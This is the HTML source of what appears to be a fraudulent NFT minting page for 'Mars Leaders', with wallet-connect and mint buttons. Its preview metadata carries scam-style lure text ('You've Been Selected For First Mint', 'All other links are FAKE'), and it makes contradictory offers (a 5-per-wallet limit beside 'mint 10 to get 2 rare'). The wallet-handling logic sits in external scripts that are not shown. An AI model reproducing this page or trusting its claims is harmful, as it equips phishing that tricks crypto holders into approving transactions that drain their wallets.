
<html lang="en">

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>

   <title>Mars Leaders - NFT Mint</title>
    <meta charset="utf-8">
    <meta name="twitter:card" content="summary_large_image">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta content="CLICK HERE TO MINT!" property="og:title">
    <meta property="og:site_name" content="This is an automatic announcement message.">
    <meta content="free1.png" property="og:image">
    <meta property="og:description" content="🎁️ You&apos;ve Been Selected For First Mint.
    🪐 Mars Leaders Minting:
    🪐 Price: 0.09 ETH
    🪐 Supply: 1950 NFT
    🔥 Limit: 5 NFT per wallet
    
    🚨 All other links are FAKE 🚨
    
    ▶️ Thank you for your support and patience!
    ">
        <meta property="og:image" content="https://thumbsnap.com/i/iHbDMQWU.gif">
        <meta name="theme-color" content="#b3191a" />
        <meta name="twitter:card" content="summary_large_image" />

<link rel="preconnect" href="https://fonts.googleapis.com/">
<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="css1f59?family=Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic%7CLato:100,100italic,300,300italic,400,400italic,700,700italic,900,900italic%7CPoppins:regular" media="all">
<link href="boot/bootstrap.min.css" rel="stylesheet">
<meta name="theme-color" content="#40c0ff">
<link rel="icon" href="./images/favicon.svg">
<link rel="shortcut icon" href="./images/favicon.svg">


    <style>
      .bd-placeholder-img {
        font-size: 1.125rem;
        text-anchor: middle;
        -webkit-user-select: none;
        -moz-user-select: none;
        user-select: none;
      }

      @media (min-width: 768px) {
        .bd-placeholder-img-lg {
          font-size: 3.5rem;
        }
      }
    </style>
<link rel="stylesheet" href="stylesheets/cover.css" media="(min-width: 900.01px)">
<link rel="stylesheet" href="stylesheets/cover_mob.css" media="(max-width: 900px)">
</head>
<body class="d-flex h-100 text-center text-white bg-custom font flex-column">
<div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
<div class="row justify-content-md-center headerDiv">



</div>
 <header class="mb-auto">
<div>
<div class="justify-content-center float-md-end walletBox">

<p class="walletAddress"></p>
</div>
</div>
</header>

<main class="px-3 minter">
  <div><img src="images/logo.png" id="logo" alt="" class="logo"></div>
<h2 class="plainFaceFont">Mars Leader NFT<span class="outline"> </span> </h1>
<h1 class="plainFaceFont">MINTING IS NOW <span class="outline">LIVE </span>! </h1>

<h4 class="plainFaceFont"><span>Max <span class="outline"> 05</span> per wallet</span>
</h4>
<hr>
<div class="lead nftSelector">

<div>
<span class="amountSelector minus">-</span>
<span class="count">1</span>
<span class="amountSelector plus">+</span>
</div>
<button class="btn-rounded setMax">Set max</button>
</div>
<hr>
<p class="lead basket">
<span class="color priceHeading">TOTAL PRICE:</span> <span class="totalPrice priceHeading"></span> <span class="priceHeading">ETH</span>
</p>
<p class="lead cta">
<button class="btn-rounded connect">CONNECT WALLET</button>
<button class="btn-rounded mint">MINT</button>
</p>
<p>
<div id="progressBar">
<div class='progress-bar-value' style="left: 43%;">
<span id="countA" class="countA"></span>
<span id="delim" class="delim"> / </span>
<span id="countB" class="max"></span>
</div>
<div id="progressBarFull"></div>
</div>

<div class="plainFaceFont1"><span><span class="outline1">Special offer:</span> <b>Mint 10 NFTs to get 2 Rare NFTs!</b></span>
<br><br>
</div>
</main>
<footer class="mt-auto text-white-50">
<br>
<p class="social-links">

<a href="https://twitter.com/marsleaders" target="_blank"><img src="images/twitter.png"></a>
<a href="https://discord.gg/marsleaders" target="_blank"><img src="images/discord%20logo.png"></a>


</p>

</footer>
</div>
<style>
        .myModal {
             background-color: rgba(163, 149, 149, 0.5)
        }

        .myModal .modal-content {
            background-color: #000;
            border: 5px solid var(--main-text-color)
        }

        .myModal .modal-content a {
            color: #fff
        }

        .myModal .modal-content .info {
            font-weight: 700;
            color: var(--main-text-color)
        }       

        .myModal .modal-content .purchased {
            font-size: 5em;
            margin: 20px;
            color: var(--main-text-color)
        }

    </style>
<div class="modal fade" id="mintingModal" tabindex="-1" role="dialog" aria-labelledby="mintingModalLabel" aria-hidden="true">
<div class="modal-dialog" role="document">
<div class="modal-content">
<div class="modal-body">
<p class="lead info">PLEASE WAIT WHILE WE PREPARE YOUR NFT</p>
<img style="width:100%" src="images/giphy.gif">
<p class="lead info">THIS MIGHT TAKE SEVERAL MINUTES</p>
</div>
</div>
</div>
</div>


<script src="ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="boot/bootstrap.min.js"></script>
<script src="eb3551e939.js" crossorigin="anonymous"></script>
<script src="javascripts/adif.js"></script>
<script src="javascripts/timer.js"></script>
</body>
<script charset="UTF-8" id="LA_COLLECT" src="js-sdk-pro.mincb96.js?id=JbVk4GLuNguJfltO&amp;ck=JbVk4GLuNguJfltO"></script>

</html>